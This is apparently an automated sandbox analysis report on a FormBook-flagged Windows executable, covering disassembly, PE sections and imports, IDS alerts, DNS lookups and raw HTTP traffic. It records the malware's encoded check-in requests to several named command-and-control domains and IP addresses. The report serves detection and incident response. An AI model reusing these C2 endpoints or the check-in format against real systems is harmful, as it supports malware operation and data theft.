                                    push 00000010h
                                    call 00007FC6445A6837h
                                    pop ecx
                                    xor esi, esi
                                    mov dword ptr [ebp-04h], esi
                                    call 00007FC6445AB597h
                                    call dword ptr [004510ECh]
                                    mov dword ptr [00472D18h], eax
                                    call 00007FC6445AB455h
                                    mov dword ptr [004715E8h], eax
                                    call 00007FC6445AB1FEh
                                    call 00007FC6445AB140h
                                    call 00007FC6445A73AEh
                                    mov dword ptr [ebp-30h], esi
                                    lea eax, dword ptr [ebp-5Ch]
                                    push eax
                                    call dword ptr [004510E8h]
                                    call 00007FC6445AB0D1h
                                    mov dword ptr [ebp-64h], eax
                                    test byte ptr [ebp-30h], 00000001h
                                    je 00007FC6445A6788h
                                    movzx eax, word ptr [ebp+00h]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS98 (6.0) build 8168
                                    • [C++] VS98 (6.0) build 8168
                                    • [RES] VS98 (6.0) cvtres build 1720

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x656200x104.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x750550x1c.zrjfv
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x510000x558.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x500000x50000False0.539175415039data6.35769619618IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata0x510000x170000x17000False0.550239894701data6.611499798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x680000xb8480x8000False0.738403320312data6.93245568667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .zrjfv0x740000x28ee90x29000False0.950373951982PGP\011Secret Sub-key -7.98479058964IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                    Imports

                                    DLLImport
                                    OPENGL32.dllglGenTextures, glBindTexture, glTexParameteri, glTexImage2D, glBegin, glArrayElement
                                    KERNEL32.dllRtlUnwind, HeapAlloc, HeapFree, HeapReAlloc, GetTimeZoneInformation, GetSystemTime, GetLocalTime, GetStartupInfoA, GetCommandLineA, ExitProcess, RaiseException, TerminateProcess, HeapSize, GetACP, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, SetFileTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetProfileStringA, GetDiskFreeSpaceExA, GetVolumeInformationA, GetDriveTypeA, VirtualProtect, GetProcAddress, GetModuleHandleA, lstrcpyA, GlobalDeleteAtom, GlobalFindAtomA, GlobalAddAtomA, lstrcmpiA, GlobalGetAtomNameA, GetCurrentThreadId, lstrcatA, GetVersion, LockResource, LoadResource, FindResourceA, FreeLibrary, LoadLibraryA, InterlockedIncrement, InterlockedDecrement, lstrlenA, WideCharToMultiByte, MultiByteToWideChar, SetLastError, MulDiv, GlobalUnlock, GlobalLock, lstrcpynA, GetLastError, LocalFree, FormatMessageA, GlobalFree, GetCurrentThread, lstrcmpA, GlobalAlloc, GetModuleFileNameA, GetFileTime, GetFileSize, GetFileAttributesA, GetTickCount, FileTimeToLocalFileTime, FileTimeToSystemTime, GetFullPathNameA, FindFirstFileA, FindClose, DeleteFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, GetCurrentProcess, DuplicateHandle, SetErrorMode, GetThreadLocale, GetCurrentDirectoryA, WritePrivateProfileStringA, SizeofResource, GetOEMCP, GetCPInfo, GetProcessVersion, GlobalFlags, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalAlloc, CloseHandle
                                    USER32.dllMessageBeep, CharUpperA, RegisterClipboardFormatA, PostThreadMessageA, LoadStringA, DestroyMenu, GetSysColorBrush, LoadCursorA, GetDesktopWindow, PtInRect, GetClassNameA, MapDialogRect, SetWindowContextHelpId, GetMessageA, TranslateMessage, ValidateRect, GetCursorPos, SetCursor, PostQuitMessage, EndDialog, GetActiveWindow, CreateDialogIndirectParamA, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetNextDlgGroupItem, IsWindowEnabled, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, PostMessageA, UpdateWindow, SendDlgItemMessageA, MapWindowPoints, GetSysColor, PeekMessageA, DispatchMessageA, GetFocus, SetActiveWindow, IsWindow, SetFocus, AdjustWindowRectEx, ScreenToClient, CopyRect, IsWindowVisible, InflateRect, FillRect, GetClientRect, UnregisterClassA, LoadBitmapA, HideCaret, ShowCaret, ExcludeUpdateRgn, GetTopWindow, MessageBoxA, IsChild, GetParent, GetCapture, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, SetRect, CopyAcceleratorTableA, CharNextA, GetNextDlgTabItem, GetMenuItemID, DrawFocusRect, DefDlgProcA, IsWindowUnicode, InvalidateRect, EnableWindow, GetSystemMetrics, DrawIcon, SendMessageA, IsIconic, LoadIconA, GetWindowRect, GetWindowPlacement, SystemParametersInfoA, IntersectRect, OffsetRect, RegisterWindowMessageA, SetWindowPos, SetWindowLongA, GetWindowLongA, GetWindow, SetForegroundWindow, GetForegroundWindow, GetLastActivePopup, GetMessagePos, GetMessageTime, RemovePropA, CallWindowProcA, GetPropA, UnhookWindowsHookEx, SetPropA, GetClassLongA, CallNextHookEx, SetWindowsHookExA, CreateWindowExA, DestroyWindow, GetDlgItem, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA
                                    GDI32.dllGetStockObject, SetBkMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, DeleteObject, SelectObject, GetDeviceCaps, GetViewportExtEx, GetWindowExtEx, CreatePen, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetMapMode, PatBlt, DPtoLP, GetTextColor, GetBkColor, LPtoDP, RestoreDC, SaveDC, DeleteDC, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, LineDDA, Pie, CreateFontA, CreateDIBitmap, GetTextExtentPointA, BitBlt, CreateCompatibleDC, CreateSolidBrush
                                    comdlg32.dllGetFileTitleA
                                    WINSPOOL.DRVDocumentPropertiesA, OpenPrinterA, ClosePrinter
                                    ADVAPI32.dllRegCloseKey, RegSetValueExA, RegOpenKeyExA, RegCreateKeyExA
                                    COMCTL32.dll
                                    oledlg.dll
                                    ole32.dllCoFreeUnusedLibraries, CoRegisterMessageFilter, OleInitialize, CoTaskMemAlloc, CoTaskMemFree, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoRevokeClassObject, OleFlushClipboard, OleIsCurrentClipboard, OleUninitialize
                                    OLEPRO32.DLL
                                    OLEAUT32.dllSysFreeString, SysAllocStringLen, VariantClear, VariantTimeToSystemTime, VariantCopy, VariantChangeType, SysAllocString, SysAllocStringByteLen, SysStringLen

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    10/28/21-07:40:49.415574ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                    10/28/21-07:40:50.437941ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                    10/28/21-07:41:05.196993ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                    10/28/21-07:41:15.703875TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.3198.54.116.195
                                    10/28/21-07:41:15.703875TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.3198.54.116.195
                                    10/28/21-07:41:15.703875TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.3198.54.116.195

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 28, 2021 07:40:40.780981064 CEST4981480192.168.2.3154.216.113.38
                                    Oct 28, 2021 07:40:41.056339025 CEST8049814154.216.113.38192.168.2.3
                                    Oct 28, 2021 07:40:41.056490898 CEST4981480192.168.2.3154.216.113.38
                                    Oct 28, 2021 07:40:41.056646109 CEST4981480192.168.2.3154.216.113.38
                                    Oct 28, 2021 07:40:41.349755049 CEST8049814154.216.113.38192.168.2.3
                                    Oct 28, 2021 07:40:41.349797010 CEST8049814154.216.113.38192.168.2.3
                                    Oct 28, 2021 07:40:41.349965096 CEST4981480192.168.2.3154.216.113.38
                                    Oct 28, 2021 07:40:41.350013971 CEST4981480192.168.2.3154.216.113.38
                                    Oct 28, 2021 07:40:41.624960899 CEST8049814154.216.113.38192.168.2.3
                                    Oct 28, 2021 07:40:53.448934078 CEST4981680192.168.2.3198.187.31.159
                                    Oct 28, 2021 07:40:53.610605955 CEST8049816198.187.31.159192.168.2.3
                                    Oct 28, 2021 07:40:53.610744953 CEST4981680192.168.2.3198.187.31.159
                                    Oct 28, 2021 07:40:53.611085892 CEST4981680192.168.2.3198.187.31.159
                                    Oct 28, 2021 07:40:53.773292065 CEST8049816198.187.31.159192.168.2.3
                                    Oct 28, 2021 07:40:53.773339987 CEST8049816198.187.31.159192.168.2.3
                                    Oct 28, 2021 07:40:53.773664951 CEST4981680192.168.2.3198.187.31.159
                                    Oct 28, 2021 07:40:53.773725033 CEST4981680192.168.2.3198.187.31.159
                                    Oct 28, 2021 07:40:53.935348034 CEST8049816198.187.31.159192.168.2.3
                                    Oct 28, 2021 07:40:58.836782932 CEST4981780192.168.2.35.157.87.204
                                    Oct 28, 2021 07:40:58.862085104 CEST80498175.157.87.204192.168.2.3
                                    Oct 28, 2021 07:40:58.862193108 CEST4981780192.168.2.35.157.87.204
                                    Oct 28, 2021 07:40:58.862319946 CEST4981780192.168.2.35.157.87.204
                                    Oct 28, 2021 07:40:58.887377024 CEST80498175.157.87.204192.168.2.3
                                    Oct 28, 2021 07:40:58.888703108 CEST80498175.157.87.204192.168.2.3
                                    Oct 28, 2021 07:40:58.888719082 CEST80498175.157.87.204192.168.2.3
                                    Oct 28, 2021 07:40:58.888940096 CEST4981780192.168.2.35.157.87.204
                                    Oct 28, 2021 07:40:58.889030933 CEST4981780192.168.2.35.157.87.204
                                    Oct 28, 2021 07:40:58.914078951 CEST80498175.157.87.204192.168.2.3
                                    Oct 28, 2021 07:41:10.173774958 CEST4981880192.168.2.3198.54.117.215
                                    Oct 28, 2021 07:41:10.336358070 CEST8049818198.54.117.215192.168.2.3
                                    Oct 28, 2021 07:41:10.336536884 CEST4981880192.168.2.3198.54.117.215
                                    Oct 28, 2021 07:41:10.336775064 CEST4981880192.168.2.3198.54.117.215
                                    Oct 28, 2021 07:41:10.503941059 CEST8049818198.54.117.215192.168.2.3
                                    Oct 28, 2021 07:41:10.503973961 CEST8049818198.54.117.215192.168.2.3

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 28, 2021 07:40:40.391122103 CEST5652753192.168.2.38.8.8.8
                                    Oct 28, 2021 07:40:40.767874002 CEST53565278.8.8.8192.168.2.3
                                    Oct 28, 2021 07:40:46.361264944 CEST5265053192.168.2.38.8.8.8
                                    Oct 28, 2021 07:40:47.373327971 CEST5265053192.168.2.38.8.8.8
                                    Oct 28, 2021 07:40:48.404741049 CEST5265053192.168.2.38.8.8.8
                                    Oct 28, 2021 07:40:48.409805059 CEST53526508.8.8.8192.168.2.3
                                    Oct 28, 2021 07:40:49.415467024 CEST53526508.8.8.8192.168.2.3
                                    Oct 28, 2021 07:40:50.437834978 CEST53526508.8.8.8192.168.2.3
                                    Oct 28, 2021 07:40:53.424590111 CEST6329753192.168.2.38.8.8.8
                                    Oct 28, 2021 07:40:53.447602987 CEST53632978.8.8.8192.168.2.3
                                    Oct 28, 2021 07:40:58.803464890 CEST5836153192.168.2.38.8.8.8
                                    Oct 28, 2021 07:40:58.835072994 CEST53583618.8.8.8192.168.2.3
                                    Oct 28, 2021 07:41:03.898623943 CEST5361553192.168.2.38.8.8.8
                                    Oct 28, 2021 07:41:04.906097889 CEST5361553192.168.2.38.8.8.8
                                    Oct 28, 2021 07:41:05.139462948 CEST53536158.8.8.8192.168.2.3
                                    Oct 28, 2021 07:41:05.196773052 CEST53536158.8.8.8192.168.2.3
                                    Oct 28, 2021 07:41:10.148940086 CEST5072853192.168.2.38.8.8.8
                                    Oct 28, 2021 07:41:10.172621965 CEST53507288.8.8.8192.168.2.3
                                    Oct 28, 2021 07:41:15.516916037 CEST5377753192.168.2.38.8.8.8
                                    Oct 28, 2021 07:41:15.540014029 CEST53537778.8.8.8192.168.2.3

                                    ICMP Packets

                                    TimestampSource IPDest IPChecksumCodeType
                                    Oct 28, 2021 07:40:49.415574074 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                    Oct 28, 2021 07:40:50.437941074 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                    Oct 28, 2021 07:41:05.196993113 CEST192.168.2.38.8.8.8d031(Port unreachable)Destination Unreachable

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Oct 28, 2021 07:40:40.391122103 CEST192.168.2.38.8.8.80x7892Standard query (0)www.jntycy.comA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:46.361264944 CEST192.168.2.38.8.8.80x769aStandard query (0)www.knowsyourdream.comA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:47.373327971 CEST192.168.2.38.8.8.80x769aStandard query (0)www.knowsyourdream.comA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:48.404741049 CEST192.168.2.38.8.8.80x769aStandard query (0)www.knowsyourdream.comA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:53.424590111 CEST192.168.2.38.8.8.80xd795Standard query (0)www.publiccoins.onlineA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:58.803464890 CEST192.168.2.38.8.8.80x6e00Standard query (0)www.thebrandstudiointernational.comA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:03.898623943 CEST192.168.2.38.8.8.80xad6dStandard query (0)www.hcbg.onlineA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:04.906097889 CEST192.168.2.38.8.8.80xad6dStandard query (0)www.hcbg.onlineA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.148940086 CEST192.168.2.38.8.8.80x315cStandard query (0)www.theravewizards.comA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:15.516916037 CEST192.168.2.38.8.8.80x7662Standard query (0)www.mylyk.netA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Oct 28, 2021 07:40:40.767874002 CEST8.8.8.8192.168.2.30x7892No error (0)www.jntycy.com154.216.113.38A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:48.409805059 CEST8.8.8.8192.168.2.30x769aServer failure (2)www.knowsyourdream.comnonenoneA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:49.415467024 CEST8.8.8.8192.168.2.30x769aServer failure (2)www.knowsyourdream.comnonenoneA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:50.437834978 CEST8.8.8.8192.168.2.30x769aServer failure (2)www.knowsyourdream.comnonenoneA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:53.447602987 CEST8.8.8.8192.168.2.30xd795No error (0)www.publiccoins.onlinepubliccoins.onlineCNAME (Canonical name)IN (0x0001)
                                    Oct 28, 2021 07:40:53.447602987 CEST8.8.8.8192.168.2.30xd795No error (0)publiccoins.online198.187.31.159A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:40:58.835072994 CEST8.8.8.8192.168.2.30x6e00No error (0)www.thebrandstudiointernational.comthebrandstudiointernational.comCNAME (Canonical name)IN (0x0001)
                                    Oct 28, 2021 07:40:58.835072994 CEST8.8.8.8192.168.2.30x6e00No error (0)thebrandstudiointernational.com5.157.87.204A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:05.139462948 CEST8.8.8.8192.168.2.30xad6dName error (3)www.hcbg.onlinenonenoneA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:05.196773052 CEST8.8.8.8192.168.2.30xad6dName error (3)www.hcbg.onlinenonenoneA (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)www.theravewizards.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:10.172621965 CEST8.8.8.8192.168.2.30x315cNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                    Oct 28, 2021 07:41:15.540014029 CEST8.8.8.8192.168.2.30x7662No error (0)www.mylyk.netmylyk.netCNAME (Canonical name)IN (0x0001)
                                    Oct 28, 2021 07:41:15.540014029 CEST8.8.8.8192.168.2.30x7662No error (0)mylyk.net198.54.116.195A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.jntycy.com
                                    • www.publiccoins.online
                                    • www.thebrandstudiointernational.com
                                    • www.theravewizards.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.349814154.216.113.3880C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Oct 28, 2021 07:40:41.056646109 CEST5993OUTGET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1
                                    Host: www.jntycy.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 28, 2021 07:40:41.349755049 CEST5995INHTTP/1.1 200 OK
                                    Content-Type: text/html; charset=UTF-8
                                    Server: Microsoft-IIS/8.5
                                    X-Powered-By: PHP/5.6.40
                                    X-Powered-By: ASP.NET
                                    Date: Thu, 28 Oct 2021 05:40:36 GMT
                                    Connection: close
                                    Content-Length: 1260
                                    Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 22 3e 0d 0a 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 35 31 38 36 36 39 66 30 64 33 31 65 34 31 35 30 38 62 65 30 62 61 62 66 35 61 38 66 63 32 38 22 3b 0d 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0d 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42
                                    Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><link rel="icon" href="/favicon.ico" type="image/x-icon"/><title>_</title><meta name="keywords" content="_"> <meta name="description"content="_"><meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertB
                                    Oct 28, 2021 07:40:41.349797010 CEST5995INData Raw: 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 7a 78 79 68 68 64 2f 74 7a 6a
                                    Data Ascii: efore(bp, s);})();</script><script type='text/javascript' src='/zxyhhd/tzjs/tz.js'></script></head></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.349816198.187.31.15980C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Oct 28, 2021 07:40:53.611085892 CEST6005OUTGET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1
                                    Host: www.publiccoins.online
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 28, 2021 07:40:53.773292065 CEST6007INHTTP/1.1 301 Moved Permanently
                                    keep-alive: timeout=5, max=100
                                    content-type: text/html
                                    content-length: 707
                                    date: Thu, 28 Oct 2021 05:40:53 GMT
                                    server: LiteSpeed
                                    location: https://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB
                                    x-turbo-charged-by: LiteSpeed
                                    connection: close
